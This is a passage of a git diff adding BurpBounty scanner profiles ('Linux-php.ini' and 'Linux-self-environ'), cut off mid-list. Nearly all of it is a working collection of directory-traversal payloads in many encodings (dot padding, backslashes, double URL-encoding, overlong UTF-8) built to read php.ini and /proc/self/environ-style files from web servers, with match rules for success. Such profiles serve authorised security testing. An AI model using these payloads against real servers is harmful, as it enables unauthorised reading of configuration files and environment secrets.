"true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,About php.ini" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-php.ini", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-php.ini", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "apache2/php.ini", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-self-environ.bb b/profiles/Linux-self-environ.bb index 0c361d5..c8a5c28 100755 --- a/profiles/Linux-self-environ.bb +++ b/profiles/Linux-self-environ.bb @@ -1 +1,950 @@ -[{"Name":"Linux-self-environ","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{F